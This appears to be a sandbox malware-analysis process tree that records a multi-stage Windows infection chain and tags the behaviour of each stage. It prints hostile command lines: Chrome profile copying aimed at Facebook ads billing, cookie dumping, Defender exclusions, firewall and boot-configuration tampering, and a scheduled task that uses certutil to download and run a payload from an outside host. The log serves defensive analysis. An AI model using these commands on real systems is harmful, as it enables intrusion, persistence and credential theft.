C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3068 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:125⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jev4c2gx1nf\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\jev4c2gx1nf\chashepro3.exe" /VERYSILENT23⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QKUJ9.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-QKUJ9.tmp\chashepro3.tmp" /SL5="$802C0,1478410,58368,C:\Users\Admin\AppData\Local\Temp\jev4c2gx1nf\chashepro3.exe" /VERYSILENT24⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\h3axto2vspk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\h3axto2vspk\Setup3310.exe" /Verysilent /subid=57723⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QGSAK.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-QGSAK.tmp\Setup3310.tmp" /SL5="$17050A,802346,56832,C:\Users\Admin\AppData\Local\Temp\h3axto2vspk\Setup3310.exe" /Verysilent /subid=57724⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M9BPM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M9BPM.tmp\Setup.exe" /Verysilent25⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SLUKT.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SLUKT.tmp\Setup.tmp" /SL5="$20B14,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-M9BPM.tmp\Setup.exe" /Verysilent26⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Messure.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-APKS7.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-APKS7.tmp\Messure.tmp" /SL5="$7068C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Messure.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-R3SOD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R3SOD.tmp\Setup.exe" /VERYSILENT29⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\PictureLAb.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K7EQR.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-K7EQR.tmp\PictureLAb.tmp" /SL5="$8068C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\PictureLAb.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EA41H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EA41H.tmp\Setup.exe" /VERYSILENT29⤵
-
C:\Users\Admin\AppData\Local\Temp\is-576OI.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-576OI.tmp\Setup.tmp" /SL5="$60988,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-EA41H.tmp\Setup.exe" /VERYSILENT30⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q3DDQ.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-Q3DDQ.tmp\def.exe" /S /UID=lab21431⤵
-
C:\Users\Admin\AppData\Local\Temp\b1-00576-b1a-e5995-2cfb6fbf4fefe\Sovowutoge.exe"C:\Users\Admin\AppData\Local\Temp\b1-00576-b1a-e5995-2cfb6fbf4fefe\Sovowutoge.exe"32⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gpfun0pm.5tg\md7_7dfj.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\gpfun0pm.5tg\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\gpfun0pm.5tg\md7_7dfj.exe34⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ai30kkbm.xqu\askinstall18.exe & exit33⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Delta.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1AUQC.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-1AUQC.tmp\Delta.tmp" /SL5="$50B8E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Delta.exe" /Verysilent28⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uperdx2syut\wrepiuvp5w3.exe"C:\Users\Admin\AppData\Local\Temp\uperdx2syut\wrepiuvp5w3.exe" /ustwo INSTALL23⤵
-
-
C:\Users\Admin\AppData\Local\Temp\01yy430jmar\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\01yy430jmar\askinstall24.exe"23⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1452,16012961976689620770,7956683281350075057,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:225⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,16012961976689620770,7956683281350075057,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1692 /prefetch:825⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\akg2y2eu2qr\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\akg2y2eu2qr\chashepro3.exe" /VERYSILENT23⤵
-
C:\Users\Admin\AppData\Local\Temp\is-28ID6.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-28ID6.tmp\chashepro3.tmp" /SL5="$5083C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\akg2y2eu2qr\chashepro3.exe" /VERYSILENT24⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Delta.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1MMQM.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-1MMQM.tmp\Delta.tmp" /SL5="$4039C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Delta.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4T9JH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4T9JH.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-4T9JH.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵
- Blocklisted process makes network request
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\zznote.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ABPTK.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-ABPTK.tmp\zznote.tmp" /SL5="$5039C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\zznote.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-INA7P.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-INA7P.tmp\jg4_4jaa.exe" /silent14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\hjjgaa.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abz1zpnfd2k\vpn.exe"C:\Users\Admin\AppData\Local\Temp\abz1zpnfd2k\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\lvsgkxmu32j\tbf5e3oskok.exe"C:\Users\Admin\AppData\Local\Temp\lvsgkxmu32j\tbf5e3oskok.exe" 57a764d042bf88⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\4DY9D8C0UK\H24OL7I1T.exe" 57a764d042bf8 & exit9⤵
-
C:\Program Files\4DY9D8C0UK\H24OL7I1T.exe"C:\Program Files\4DY9D8C0UK\H24OL7I1T.exe" 57a764d042bf810⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\s4vwg0thezh\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\s4vwg0thezh\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mno5qur0nrc\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\mno5qur0nrc\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\5qqx5anlpvp\igfzl2wj0pz.exe"C:\Users\Admin\AppData\Local\Temp\5qqx5anlpvp\igfzl2wj0pz.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6529⤵
- Drops file in Windows directory
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6649⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6689⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6849⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 8849⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 9329⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 11809⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 12089⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 13129⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 10969⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\uiyv1rq20iq\app.exe"C:\Users\Admin\AppData\Local\Temp\uiyv1rq20iq\app.exe" /8-238⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Silent-Rain"9⤵
-
-
C:\Program Files (x86)\Silent-Rain\7za.exe"C:\Program Files (x86)\Silent-Rain\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Silent-Rain\app.exe" -map "C:\Program Files (x86)\Silent-Rain\WinmonProcessMonitor.sys""9⤵
-
C:\Program Files (x86)\Silent-Rain\app.exe"C:\Program Files (x86)\Silent-Rain\app.exe" -map "C:\Program Files (x86)\Silent-Rain\WinmonProcessMonitor.sys"10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
-
-
-
C:\Program Files (x86)\Silent-Rain\7za.exe"C:\Program Files (x86)\Silent-Rain\7za.exe" e -p154.61.71.51 winamp.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Silent-Rain\app.exe"C:\Program Files (x86)\Silent-Rain\app.exe" /8-239⤵
-
C:\Program Files (x86)\Silent-Rain\app.exe"C:\Program Files (x86)\Silent-Rain\app.exe" /8-2310⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2311⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F12⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"12⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe13⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 013⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 113⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 013⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}13⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy13⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe12⤵
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"12⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)13⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"13⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=bd06205b-5373-4bbd-99b5-d114b246947d&browser=chrome14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2015⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 /prefetch:815⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1640 /prefetch:815⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1556 /prefetch:215⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:115⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:115⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:115⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:115⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4500 /prefetch:815⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:815⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:815⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe12⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\flzhmouczqi\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\flzhmouczqi\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-772N7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-772N7.tmp\Setup3310.tmp" /SL5="$C0562,802346,56832,C:\Users\Admin\AppData\Local\Temp\flzhmouczqi\Setup3310.exe" /Verysilent /subid=5779⤵
-
